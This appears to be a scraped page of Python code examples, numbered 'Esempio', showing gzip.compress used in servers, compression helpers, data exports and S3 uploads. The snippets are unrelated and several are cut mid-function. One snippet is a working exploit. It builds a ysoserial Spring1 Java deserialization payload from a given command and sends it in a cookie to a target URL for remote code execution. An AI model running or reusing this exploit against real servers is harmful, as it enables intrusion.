        reqParams = {'code': 406, 'ctype': k, 'length': 0, 'etag': ''}

        res = generateGET(reqParams)
        logger.generateError(headers[0], res)
        return res, ""
    try:
        if (path == "/"):
            path = documentRoot + 'index.html'
        else:
            try:
                try:
                    extension = '.' + path.split('.')[1]
                except:
                    extension = '.' + ctype.split('/')[1]
                path = documentRoot + path
            except Exception as e:
                logger.ServerError(e)
                for i in par:
                    if (os.path.exists(documentRoot + i)):
                        ctype = i
                        break
        reqParams = {
            'length': 0,
            'code': 200,
            'ctype': ctype,
            'etag': '',
        }

        if ('.' not in path.split('\n')[-1]):
            path += '.' + ctype.split('/')[1]
        f = open(path, "rb")
        resource = f.read()
        lastModified = os.path.getmtime(path)
        Etag = generateEtag(lastModified, len(resource))
        try:
            length = len(resource)
        except:
            pass
        reqParams['etag'] = Etag
        reqParams['length'] = length
        if ('Cookie' in params.keys()):
            reqParams['Cookie'] = params['Cookie']

        if (method == "HEAD"):
            res = generateGET(reqParams)
            logger.generate(headers[0], res)
            print(res)
            return res, ""

        #415
        if ('Content-Encoding' in params.keys() and params['Content-Encoding']
                not in entityHeaders['Content-Encoding']):
            res = generateResponse(0, 415)
            f.close()
            logger.generateError(headers[0], res)
            return res, ""
        res = generateGET(reqParams)

        if ('If-None-Match' in params.keys()):
            e = Etag
            if (e == params['If-None-Match']):
                reqParams['code'] = 304
                reqParams['length'] = 0
                res = generateGET(reqParams)
                logger.generate(headers[0], res)

        # if ('If-Modified-Since' in params.keys()):
        #     # print(datetime(params['If-Modified-Since']))
        #     months = {
        #         'Jan' : 1,  'Feb' : 2,  'Mar' : 3, 'Apr' : 4,  'May' :5, 'Jun' : 6,
        #         'Jul' : 7,  'Aug' : 8, 'Sep' : 9, 'Oct' : 10,'Nov' : 11,  'Dec' : 12
        #     }
        #     l = params['If-Modified-Since'][5:].split(' ')
        #     timeString = l[3].split(':')
        #     hours, minutes, seconds = int(timeString[0]), int(timeString[1]), int(timeString[2])
        #     day, month, year  = int(l[0]), months[l[1]], int(l[2])
        #     time = datetime(year,month, day, hours, minutes, seconds)
        #     timeMillis = millis(time)
        #     print(lastModified, timeMillis)
        #     if(lastModified > timeMillis):
        #         reqParams['code'] = 304
        #         reqParams['length'] = 0
        #         res = generateGET(reqParams)
        #         logger.generate(headers[0],res)

        #Successfull Content Encoding
        if ('Accept-Encoding' in params.keys()):
            if (params['Accept-Encoding'] == 'gzip'):
                newres = ''
                for i in res.split('\r\n'):
                    if ('Content-Length' in i):
                        continue
                    else:
                        newres += i + '\r\n'
                resource = gzip.compress(resource)
                newres = newres[:len(newres) -
                                4] + 'Content-Length: {}\r\n'.format(
                                    len(resource)
                                ) + 'Accept-Encoding: gzip' + '\r\n\r\n'
                res = newres
            elif (params['Accept-Encoding'] == 'deflate'):
                newres = ''
                for i in res.split('\r\n'):
                    if ('Content-Length' in i):
                        continue
                    else:
                        newres += i + '\r\n'
                resource = zlib.compress(resource)
                newres = newres[:len(newres) -
                                4] + 'Content-Length: {}\r\n'.format(
                                    len(resource)
                                ) + 'Accept-Encoding: deflate' + '\r\n\r\n'
                res = newres
            elif (params['Accept-Encoding'] == 'br'):
                newres = ''
                for i in res.split('\r\n'):
                    if ('Content-Length' in i):
                        continue
                    else:
                        newres += i + '\r\n'
                newres = newres[:len(newres) -
                                4] + 'Content-Length: {}\r\n'.format(
                                    len(resource)
                                ) + 'Accept-Encoding: br' + '\r\n\r\n'
                res = newres

        #Check at end
        if ('Accept-Ranges' in params.keys()):
            k = int(params['Accept-Ranges'])
            resRange = resource[:k]
            newres = ''
            for i in res.split('\r\n'):
                if ('Content-Length' in i):
                    continue
                else:
                    newres += i + '\r\n'
            newres = newres[:len(newres) - 4] + 'Accept-Ranges: {}\r\n'.format(
                k) + 'Content-Length: {}'.format(k) + '\r\n\r\n'
            resource = resRange
            res = newres

        logger.generate(headers[0], res)
        # print(res)
        f.close()
        return res, resource

    except FileNotFoundError:
        reqParams['code'] = 404
        reqParams['length'] = 0
        res = generateGET(reqParams)
        logger.generate(headers[0], res)
        logger.generateError(headers[0], res)
        return res, ""
Esempio n. 38
0
def digest_string(string: str) -> str:
    return str(
        base64.encodebytes(
            gzip.compress(bytes(string, 'utf8'), compresslevel=9)),
        'utf8').replace('\n', '')
Esempio n. 39
0
    def _compress(self, data: bytes) -> bytes:
        # no further compression or post processing is required
        if isinstance(self.request, Request) and not self.request.is_used:
            return data

        # otherwise there are two cases
        # 1. it is a lazy request, and being used, so `self.request.SerializeToString()` is a new uncompressed string
        # 2. it is a regular request, `self.request.SerializeToString()` is a uncompressed string
        # either way need compress
        if not self.envelope.compression.algorithm:
            return data

        ctag = CompressAlgo.from_string(self.envelope.compression.algorithm)

        if ctag == CompressAlgo.NONE:
            return data

        _size_before = sys.getsizeof(data)

        # lower than hwm, pass compression
        if (_size_before < self.envelope.compression.min_bytes
                or self.envelope.compression.min_bytes < 0):
            self.envelope.compression.algorithm = 'NONE'
            return data

        try:
            if ctag == CompressAlgo.LZ4:
                import lz4.frame

                c_data = lz4.frame.compress(data)
            elif ctag == CompressAlgo.BZ2:
                import bz2

                c_data = bz2.compress(data)
            elif ctag == CompressAlgo.LZMA:
                import lzma

                c_data = lzma.compress(data)
            elif ctag == CompressAlgo.ZLIB:
                import zlib

                c_data = zlib.compress(data)
            elif ctag == CompressAlgo.GZIP:
                import gzip

                c_data = gzip.compress(data)

            _size_after = sys.getsizeof(c_data)
            _c_ratio = _size_before / _size_after

            if _c_ratio > self.envelope.compression.min_ratio:
                data = c_data
            else:
                # compression rate is too bad, dont bother
                # save time on decompression
                default_logger.debug(
                    f'compression rate {(_size_before / _size_after):.2f}% '
                    f'is lower than min_ratio '
                    f'{self.envelope.compression.min_ratio}')
                self.envelope.compression.algorithm = 'NONE'
        except Exception as ex:
            default_logger.error(
                f'compression={str(ctag)} failed, fallback to compression="NONE". reason: {ex!r}'
            )
            self.envelope.compression.algorithm = 'NONE'

        return data
 def _compress(self, data):
     return gzip.compress(data)
Esempio n. 41
0
import sys
import os
import json
import concurrent.futures
import glob
if '--to_vec' in sys.argv:
    book_vec = {}
    for line in open('model.vec'):
        line = line.strip()
        es = line.split(' ')
        book = es.pop(0)
        vec = [float(v) for v in es]
        #print( book, vec )
        book_vec[book] = vec

    open('book_vec.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(book_vec)))


def _sim(arrs):
    arrs, index_book, books, vecs = arrs
    allnorms = np.linalg.norm(vecs, axis=(1, ))
    book_sims = {}
    for i in arrs:
        vec = vecs[i]
        book = books[i]
        if os.path.exists('sims/{}.json'.format(book)) is True:
            print('already processed', book)
            continue
        print(i, '/', size, book)
        norm = np.linalg.norm(vec) * allnorms
        invnorm = norm**-1
            shutil.copyfile(
                m_path,
                dest_path + j + "/" + s_folder + "_3T_" + j + ".nii.gz")

            print(dest_path + j + "/" + s_folder + "_3T_" + j + ".nii.gz")

            print(
                "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
            )
        elif os.path.exists(mn_path):
            print(" NII file exists   ")
            print(" =================")

            shutil.copyfile(
                mn_path, dest_path + j + "/" + s_folder + "_3T_" + j + ".nii")
            gzip.compress(dest_path + j + "/" + s_folder + "_3T_" + j + ".nii")

            if os.path.exists(dest_path + j + "/" + s_folder + "_3T_" + j +
                              ".nii.gz"):
                print(dest_path + j + "/" + s_folder + "_3T_" + j +
                      ".nii.gz      EXISTS")
            print(
                "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
            )

        else:
            print(
                "----------------------- Following data are missing ---------------------------"
            )
            print("data: ", s_folder + "_3T_" + j + ".nii.gz")
            print("fMRI folder: ",
Esempio n. 43
0
 def compress(self, data: bytes) -> bytes:
     return gzip.compress(data, compresslevel=self.compresslevel)
Esempio n. 44
0
def encode_msg(msg: Union[Request, Response]):
    """Encode the message's body"""
    if msg.headers.get('content-encoding', '') == 'gzip':
        msg.body = gzip.compress(msg.body)
Esempio n. 45
0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

__author__ = 'ipetrash'

s_in = "HelloWorld!" * 1000000
s_in = bytes(s_in, encoding='utf-8')
print(len(s_in))  # 11000000

import gzip
s_out = gzip.compress(s_in)
assert gzip.decompress(s_out) == s_in
print(len(s_out))  # 21396
port = 12345
s.bind((host, port))

# establish connection
s.listen(5)
c, addr = s.accept()
print('Connection from ', addr)
c.send('Thank you for connecting'.encode())
print(c.recv(1024))

while True:
    # take picture and store as jpeg
    with picamera.PiCamera() as cam:
        cam.capture('image.jpeg', resize=(160, 90), quality=9)

    # encode jpeg image into bytes
    with open('image.jpeg', 'rb') as image:
        read_image = image.read()
    encoded_image = base64.encodebytes(read_image)

    # compress image
    compressed_image = gzip.compress(encoded_image)
    with gzip.open('/home/pi/Documents/ECE_387/image.jpeg.gz', 'wb') as zip:
        zip.write(compressed_image)

    c.send(compressed_image)
    # print(sys.getsizeof(encoded_image))
    print(sys.getsizeof(compressed_image))
    c.recv(1024)

c.close()
Esempio n. 47
0
def heap_profile(client: Client) -> bytes:
    """Returns a gzipped pprof protocol buffer containing a heap profile."""
    return gzip.compress(client.heap_profile())
Esempio n. 48
0
def make_file_object(hash, path, data, attributes):
    global config

    index = attributes['index']
    actions = attributes['actions']
    flags = 0
    compression = ESPFS_COMPRESSION_NONE
    initial_data = data
    initial_len = len(data)

    if 'cache' in actions:
        flags |= ESPFS_FLAG_CACHE

    for action in actions:
        if action in config['preprocessors']:
            command = config['preprocessors'][action]['command']
            process = subprocess.Popen(command,
                                       stdin=subprocess.PIPE,
                                       stdout=subprocess.PIPE,
                                       shell=True)
            data = process.communicate(input=data)[0]

    file_data = data
    file_len = len(data)

    if file_len >= initial_len:
        data = initial_data
        file_len = initial_len

    if 'gzip' in actions:
        flags |= ESPFS_FLAG_GZIP
        level = config['compressors']['gzip']['level']
        level = min(max(level, 0), 9)
        data = gzip.compress(data, level)
    elif 'heatshrink' in actions:
        compression = ESPFS_COMPRESSION_HEATSHRINK
        window_sz2 = config['compressors']['heatshrink']['window_sz2']
        lookahead_sz2 = config['compressors']['heatshrink']['lookahead_sz2']
        data = espfs_heatshrink_header_t.pack(
            window_sz2, lookahead_sz2, 0) + heatshrink2.compress(
                data, window_sz2=window_sz2, lookahead_sz2=lookahead_sz2)

    data_len = len(data)

    if data_len >= file_len:
        flags &= ~ESPFS_FLAG_GZIP
        compression = ESPFS_COMPRESSION_NONE
        data = file_data
        data_len = file_len

    if initial_len < 1024:
        initial_len_str = '%d B' % (initial_len)
        data_len_str = '%d B' % (data_len)
    elif initial_len < 1024 * 1024:
        initial_len_str = '%.1f KiB' % (initial_len / 1024)
        data_len_str = '%.1f KiB' % (data_len / 1024)
    else:
        initial_len_str = '%.1f MiB' % (initial_len / 1024 / 1024)
        data_len_str = '%.1f MiB' % (data_len / 1024 / 1024)

    percent = 100.0
    if initial_len > 0:
        percent = data_len / initial_len * 100.0

    stats = '%-9s -> %-9s (%.1f%%)' % (initial_len_str, data_len_str, percent)
    print('%08x %-34s file %s' % (hash, path, stats))

    path = path.encode('utf8') + b'\0'
    path = path.ljust((len(path) + 3) // 4 * 4, b'\0')
    data = data.ljust((data_len + 3) // 4 * 4, b'\0')
    header = espfs_object_header_t.pack(
        ESPFS_TYPE_FILE, espfs_object_header_t.size + espfs_file_header_t.size,
        index, len(path), 0) + espfs_file_header_t.pack(
            data_len, file_len, flags, compression, 0)

    return header + path + data
Esempio n. 49
0
def compress_string(data):
    return gzip.compress(data.encode("utf-8"))
    id_tables = FirestoreUuidInfrastructure.init_from_credentials(firestore_uuid_table_credentials)
    if len(table_names) == 0:
        table_names = id_tables.list_table_names()
    log.info(f"Found {len(table_names)} uuid tables to export")

    export = dict()  # of table_name -> {mappings: dict of data -> uuid}
    for i, table_name in enumerate(table_names):
        log.info(f"Fetching mappings from table {i + 1}/{len(table_names)}: {table_name}...")
        mappings = id_tables.get_table(table_name, None).get_all_mappings()
        export[table_name] = {
            "mappings": mappings
        }
        log.info(f"Fetched {len(mappings)} mappings")

    log.info(f"Converting fetched data to zipped json for export...")
    json_blob = json.dumps(export)
    export_compressed = gzip.compress(bytes(json_blob, "utf-8"))

    if gzip_export_file_path is not None:
        log.warning(f"Writing mappings to local disk at '{gzip_export_file_path}'...")
        with open(gzip_export_file_path, "wb") as f:
            f.write(export_compressed)

    if gcs_upload_path is not None:
        log.info(f"Uploading the mappings to {gcs_upload_path}...")
        google_cloud_utils.upload_string_to_blob(google_cloud_credentials_file_path, gcs_upload_path,
                                                 export_compressed)

    log.info(f"Export complete ({len(table_names)} table(s))")
Esempio n. 51
0
def compress(stream):
    return gzip.compress(stream) if stream else None
Esempio n. 52
0
    def save_timetables(self, save_to_s3=False, skip_existing=False):
        agency_id = self.agency_id

        dates_map = self.get_services_by_date()

        #
        # Typically, many dates have identical scheduled timetables (with times relative to midnight on that date).
        # Instead of storing redundant timetables for each date, store one timetable per route for each unique set of service_ids.
        # Each stored timetable is named with a string 'key' which is unique for each set of service_ids.
        #
        # A "date_keys" JSON object is stored in S3 and the local cache which maps dates to keys.
        #
        # Although the keys could be any string that is legal in paths, for ease of browsing, the keys are chosen to be
        # the string representation of one date with that set of service_ids.

        first_date_for_service_ids_map = {}

        try:
            old_date_keys = timetables.get_date_keys(agency_id)
        except FileNotFoundError as err:
            old_date_keys = {}

        date_keys = old_date_keys.copy()

        for d, service_ids in dates_map.items():
            service_ids = sorted(service_ids)
            service_ids_key = json.dumps(service_ids)
            if service_ids_key not in first_date_for_service_ids_map:
                first_date_for_service_ids_map[service_ids_key] = d

            date_keys[str(d)] = str(
                first_date_for_service_ids_map[service_ids_key])

        if skip_existing and date_keys == old_date_keys:
            print("No new dates in GTFS feed, skipping")
            return

        trips_df = self.get_gtfs_trips()

        gtfs_route_id_map = {}

        route_configs = routeconfig.get_route_list(
            self.agency_id
        )  # todo: use route config from parsing this GTFS file (will eventually be needed to process old GTFS feeds)
        for route_config in route_configs:
            gtfs_route_id_map[route_config.gtfs_route_id] = route_config

        for gtfs_route_id, route_trips in trips_df.groupby('route_id'):
            if gtfs_route_id not in gtfs_route_id_map:
                continue

            route_config = gtfs_route_id_map[gtfs_route_id]

            arrivals_by_service_id = {}
            trip_ids_map = {}

            for service_id, service_route_trips in route_trips.groupby(
                    'service_id'):
                arrivals_by_service_id[
                    service_id] = self.get_scheduled_arrivals_by_service_id(
                        service_id, route_config, service_route_trips,
                        trip_ids_map)

            for service_ids_json, d in first_date_for_service_ids_map.items():
                service_ids = json.loads(service_ids_json)

                # merge scheduled arrivals for all service_ids that are in service on the same date
                merged_arrivals = {}

                for service_id in service_ids:
                    if service_id not in arrivals_by_service_id:
                        continue

                    service_id_arrivals = arrivals_by_service_id[service_id]

                    for dir_id, direction_arrivals in service_id_arrivals.items(
                    ):
                        if dir_id not in merged_arrivals:
                            merged_arrivals[dir_id] = {}

                        direction_merged_arrivals = merged_arrivals[dir_id]

                        for stop_id, stop_arrivals in direction_arrivals.items(
                        ):

                            if stop_id not in direction_merged_arrivals:
                                direction_merged_arrivals[stop_id] = []

                            direction_merged_arrivals[stop_id] = sorted(
                                direction_merged_arrivals[stop_id] +
                                stop_arrivals,
                                key=lambda arr: arr['t'])

                date_key = str(d)

                cache_path = timetables.get_cache_path(agency_id,
                                                       route_config.id,
                                                       date_key)
                Path(cache_path).parent.mkdir(parents=True, exist_ok=True)

                data_str = json.dumps(
                    {
                        'version': timetables.DefaultVersion,
                        'agency': agency_id,
                        'route_id': route_config.id,
                        'date_key': date_key,
                        'timezone_id': self.agency.timezone_id,
                        'service_ids': service_ids,
                        'arrivals': merged_arrivals,
                    },
                    separators=(',', ':'))

                with open(cache_path, "w") as f:
                    f.write(data_str)

                if save_to_s3:
                    s3_path = timetables.get_s3_path(agency_id,
                                                     route_config.id, date_key)
                    s3 = boto3.resource('s3')
                    s3_bucket = config.s3_bucket
                    print(f'saving to s3://{s3_bucket}/{s3_path}')
                    object = s3.Object(s3_bucket, s3_path)
                    object.put(Body=gzip.compress(bytes(data_str, 'utf-8')),
                               CacheControl='max-age=86400',
                               ContentType='application/json',
                               ContentEncoding='gzip',
                               ACL='public-read')

        # save date keys last, so that if an error occurs while saving timetables,
        # the timetables will be saved again even with skip_existing=True

        date_keys_cache_path = timetables.get_date_keys_cache_path(agency_id)

        Path(date_keys_cache_path).parent.mkdir(parents=True, exist_ok=True)

        data_str = json.dumps(
            {
                'version': timetables.DefaultVersion,
                'date_keys': {
                    date_str: date_key
                    for date_str, date_key in date_keys.items()
                },
            },
            separators=(',', ':'))

        with open(date_keys_cache_path, "w") as f:
            f.write(data_str)

        if save_to_s3:
            s3 = boto3.resource('s3')
            s3_path = timetables.get_date_keys_s3_path(agency_id)
            s3_bucket = config.s3_bucket
            print(f'saving to s3://{s3_bucket}/{s3_path}')
            object = s3.Object(s3_bucket, s3_path)
            object.put(Body=gzip.compress(bytes(data_str, 'utf-8')),
                       CacheControl='max-age=86400',
                       ContentType='application/json',
                       ContentEncoding='gzip',
                       ACL='public-read')
command = sys.argv[1]

payload = "{}".format(command)
print("[*] Creating payload: {}".format(payload))
os.remove(payload_file)
os.popen(
    "java -jar ./ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar Spring1 \"{}\" > {}"
    .format(payload, payload_file))
time.sleep(5)

with open(payload_file, "rb") as f:
    malicious_payload = f.read()

print("[*] Malicious payload is: {}".format(malicious_payload))

compressed_malicious_bytes = gzip.compress(malicious_payload)
print("[*] Compressed malicious bytes are: {}".format(
    compressed_malicious_bytes))

base64_compressed_malicious_payload = base64.b64encode(
    compressed_malicious_bytes).decode("ascii")
print("[*] Base64 compressed malicious string is: {}".format(
    base64_compressed_malicious_payload))

print("[*] Sending request.")
cookies = dict(counter="\"{}\"".format(base64_compressed_malicious_payload))
page = requests.get(url, headers=headers, cookies=cookies)

print("[*] Response received:\n\n{}".format(page.text))
 def create_cloudwatch_log_event_from_data(self, data):
     # CloudWatch log event data is a base64-encoded ZIP archive
     # see https://docs.aws.amazon.com/lambda/latest/dg/services-cloudwatchlogs.html
     gzipped_data = gzip.compress(bytes(data, encoding="utf-8"))
     encoded_data = base64.b64encode(gzipped_data).decode("utf-8")
     return f'{{"awslogs": {{"data": "{encoded_data}"}}}}'
#This embeds all of the assets into a .go file
#by zipping the contents and then encoding them as a string constant

import gzip
import os
import io
import base64

#Read in all the file data and compress
data = {}
for root, dirs, files in os.walk(".", topdown=True):
    for file_name in files:
        if file_name.endswith((".png", ".wav", ".ogg")):
            with open(file_name, "rb") as fin:
                root_name, extension = os.path.splitext(file_name)
                key_name = extension.upper().strip(
                    ".") + "_" + root_name.upper()
                #stream = io.BytesIO(fin.read())
                data[key_name] = gzip.compress(fin.read())
                print("Read", file_name, "into", key_name)

#Write as a string constant in a .go file
with open("assets.go", "w", encoding='utf-8') as fout:
    fout.write("package assets\n")
    for key in data:
        fout.write("const " + key + '="')
        fout.write(base64.b64encode(
            data[key]).decode("utf-8"))  #Binary content is base64 encoded
        fout.write('"\n')
Esempio n. 56
0
def fetch_action(namespace):

    # Are we resuming
    resuming = namespace.resume

    if resuming and not namespace.output:
        die(['Cannot --resume without specifying -o/--output.'])

    # Do we need to fetch only a single url?
    single_url = namespace.file is sys.stdin and is_url(namespace.column)

    if single_url:
        edit_namespace_with_csv_io(namespace, 'url')

        # If we are hitting a single url we enable contents_in_report
        if namespace.contents_in_report is None:
            namespace.contents_in_report = True

    # HTTP method
    http_method = namespace.method

    # Cookie grabber
    get_cookie = None
    if namespace.grab_cookies:
        get_cookie = grab_cookies(namespace.grab_cookies)

    # Global headers
    global_headers = None
    if namespace.headers:
        global_headers = {}

        for header in namespace.headers:
            k, v = parse_http_header(header)
            global_headers = v

    flag = 'w'
    if namespace.output is not None and resuming and isfile(namespace.output):
        flag = 'r+'

    output_file = open_output_file(namespace.output, flag=flag)

    # Resume listener
    listener = None
    resuming_reader_loading = None
    skipped = 0

    if resuming:
        resuming_reader_loading = tqdm(desc='Resuming',
                                       dynamic_ncols=True,
                                       unit=' lines')

        def listener(event, row):
            nonlocal skipped

            if event == 'resume.output':
                resuming_reader_loading.update()

            if event == 'resume.input':
                skipped += 1
                loading_bar.set_postfix(skipped=skipped)
                loading_bar.update()

    # Enricher
    enricher = casanova.threadsafe_enricher(
        namespace.file,
        output_file,
        resumable=resuming,
        auto_resume=False,
        add=OUTPUT_ADDITIONAL_HEADERS +
        (['raw_contents'] if namespace.contents_in_report else []),
        keep=namespace.select,
        listener=listener)

    if namespace.column not in enricher.pos:
        die([
            'Could not find the "%s" column containing the urls in the given CSV file.'
            % namespace.column
        ])

    url_pos = enricher.pos[namespace.column]

    filename_pos = None

    if namespace.filename is not None:
        if namespace.filename not in enricher.pos:
            die([
                'Could not find the "%s" column containing the filenames in the given CSV file.'
                % namespace.filename
            ])

        filename_pos = enricher.pos[namespace.filename]

    indexed_input_headers = {h: i for i, h in enumerate(enricher.fieldnames)}

    if resuming:
        enricher.resume()
        resuming_reader_loading.close()

    # Loading bar
    total = namespace.total

    loading_bar = tqdm(desc='Fetching pages',
                       total=total,
                       dynamic_ncols=True,
                       unit=' urls')

    def url_key(item):
        url = item[1][url_pos].strip()

        if not url:
            return

        # Url templating
        if namespace.url_template:
            return namespace.url_template.format(value=url)

        return url

    def request_args(url, item):
        cookie = None

        # Cookie
        if get_cookie:
            cookie = get_cookie(url)

        # Headers
        headers = None

        if global_headers:
            headers = global_headers

        return {'method': http_method, 'cookie': cookie, 'headers': headers}

    def write_output(index,
                     row,
                     resolved=None,
                     status=None,
                     error=None,
                     filename=None,
                     encoding=None,
                     data=None):

        addendum = [
            resolved or '', status or '', error or '', filename or '', encoding
            or ''
        ]

        if namespace.contents_in_report:
            addendum.append(data or '')

        enricher.writerow(index, row, addendum)

    errors = 0
    status_codes = Counter()

    fetch_kwargs = {
        'threads': namespace.threads,
        'throttle': namespace.throttle,
        'domain_parallelism': namespace.domain_parallelism
    }

    if namespace.timeout is not None:
        fetch_kwargs['timeout'] = namespace.timeout

    multithreaded_iterator = multithreaded_fetch(enricher,
                                                 key=url_key,
                                                 request_args=request_args,
                                                 **fetch_kwargs)

    for result in multithreaded_iterator:
        index, row = result.item

        if not result.url:

            write_output(index, row)

            loading_bar.update()
            continue

        response = result.response
        data = response.data if response is not None else None

        content_write_flag = 'wb'

        # Updating stats
        if result.error is not None:
            errors += 1
        else:
            if response.status >= 400:
                status_codes[response.status] += 1

        postfix = {'errors': errors}

        for code, count in status_codes.most_common(1):
            postfix[str(code)] = count

        loading_bar.set_postfix(**postfix)
        loading_bar.update()

        # No error
        if result.error is None:

            filename = None

            # Building filename
            if data:
                if filename_pos is not None or namespace.filename_template:
                    if namespace.filename_template:
                        filename = CUSTOM_FORMATTER.format(
                            namespace.filename_template,
                            value=row[filename_pos]
                            if filename_pos is not None else None,
                            ext=result.meta['ext'],
                            line=LazyLineDict(indexed_input_headers, row))
                    else:
                        filename = row[filename_pos] + result.meta['ext']
                else:
                    # NOTE: it would be nice to have an id that can be sorted by time
                    filename = str(uuid4()) + result.meta['ext']

            # Standardize encoding?
            encoding = result.meta['encoding']

            if data and namespace.standardize_encoding or namespace.contents_in_report:
                if encoding is None or encoding != 'utf-8' or namespace.contents_in_report:
                    data = data.decode(
                        encoding if encoding is not None else 'utf-8',
                        errors='replace')
                    encoding = 'utf-8'
                    content_write_flag = 'w'

            # Writing file on disk
            if data and not namespace.contents_in_report:

                if namespace.compress:
                    filename += '.gz'

                resource_path = join(namespace.output_dir, filename)
                resource_dir = dirname(resource_path)

                os.makedirs(resource_dir, exist_ok=True)

                with open(resource_path, content_write_flag) as f:

                    # TODO: what if standardize_encoding + compress?
                    f.write(
                        gzip.compress(data) if namespace.compress else data)

            # Reporting in output
            resolved_url = response.geturl()

            write_output(
                index,
                row,
                resolved=resolved_url if resolved_url != result.url else None,
                status=response.status,
                filename=filename,
                encoding=encoding,
                data=data)

        # Handling potential errors
        else:
            error_code = report_error(result.error)

            write_output(index, row, error=error_code)

    # Closing files
    output_file.close()
Esempio n. 57
0
import glob

import json

import pickle

import gzip

import os

import hashlib

import re
names = set([name.split('/').pop() for name in glob.glob('hrefs/*')])

urls = set()
for name in names:
    print(name)
    try:
        obj = json.loads(open('hrefs/' + name).read())
    except:
        ...
    [
        urls.add(re.sub('\?.*?$', '', url)) for url in obj
        if hashlib.sha256(bytes(url, 'utf8')).hexdigest() not in names
    ]
    if len(urls) >= 100000:
        break

open('urls.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(urls)))
Esempio n. 58
0
def apply_temple(project,
                 temple_args,
                 temple_content,
                 data_json,
                 data_key,
                 send_at=None,
                 group_id=None,
                 owner='system'):
    #用来把模板替换上内容(单条),当temple_args['add_on_func']['required']为真时,还会执行额外的ETL程序替换相应的内容
    func_result = None
    read_tracker = {
        "distinct_id": data_key,
        "event": "recall",
        "lib": {
            "$lib": "noti"
        },
        "project": project,
        "properties": {
            "$latest_utm_campaign":
            "___utm_campaign___",
            "$latest_utm_content":
            "___utm_content___",
            "$latest_utm_medium":
            "___utm_medium___",
            "$latest_utm_source":
            "___utm_source___",
            "$latest_utm_term":
            "___utm_term___",
            "$lib":
            "noti",
            "_latest_utm_email":
            "___email___",
            "_latest_utm_mobile":
            "___mobile___",
            "action":
            2,
            "sent_time":
            time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(send_at))
        },
        "type": "track"
    }
    data_json['group_id'] = group_id
    if 'add_on_func' in temple_args and 'required' in temple_args[
            'add_on_func'] and temple_args['add_on_func']['required'] is True:
        py = importlib.import_module(temple_args['add_on_func']['dir'])
        ff = getattr(py, temple_args['add_on_func']['name'])
        func_result = ff(data_json)
    for l in temple_content:
        for t in read_tracker['properties']:
            temple_content[l] = temple_content[l].replace('___owner___', owner)
            read_tracker['properties'][t] = str(
                read_tracker['properties'][t]).replace('___owner___', owner)
            for i in temple_args['args']:
                temple_content[l] = temple_content[l].replace(
                    '___' + i + '___', str(temple_args['args'][i]))
                read_tracker['properties'][t] = str(
                    read_tracker['properties'][t]).replace(
                        '___' + i + '___', str(temple_args['args'][i]))
            for d in data_json:
                temple_content[l] = temple_content[l].replace(
                    '___' + d + '___', str(data_json[d])).replace(
                        '___etl_date___',
                        time.strftime("%Y-%m-%d", time.localtime(send_at)))
                read_tracker['properties'][t] = str(
                    read_tracker['properties'][t]).replace(
                        '___' + d + '___', str(data_json[d])).replace(
                            '___etl_date___',
                            time.strftime("%Y-%m-%d", time.localtime(send_at)))
            if func_result:
                for k in func_result:
                    temple_content[l] = temple_content[l].replace(
                        '___' + k + '___', str(func_result[k]))
                    read_tracker['properties'][t] = str(
                        read_tracker['properties'][t]).replace(
                            '___' + k + '___', str(func_result[k]))
    track_url = temple_args['ghost_sa'][
        'track_url'] + '?project=' + project + '&data=' + urllib.parse.quote(
            base64.b64encode((gzip.compress(
                json.dumps(read_tracker).encode('utf-8'))))) + '&gzip=1' + (
                    '&remark=' + temple_args['ghost_sa']['remark']
                    if 'remark' in temple_args['ghost_sa'] else '')
    temple_content["content"] = temple_content["content"].replace(
        '___read_tracker___', track_url)
    read_tracker['properties']['action'] = 1
    temple_content["send_tracker"] = read_tracker
    temple_content["ghost_sa"] = temple_args['ghost_sa']
    return temple_content
Esempio n. 59
0
def convert_numpy_array_to_binary_blob(array, compress=True):
    if compress:
        return gzip.compress(memoryview(array), compresslevel=1)
    else:
        return memoryview(array)
Esempio n. 60
0
 def gzip_compress_v3(data, compresslevel=COMPRESSION_LEVEL):
     return gzip.compress(data, compresslevel=compresslevel)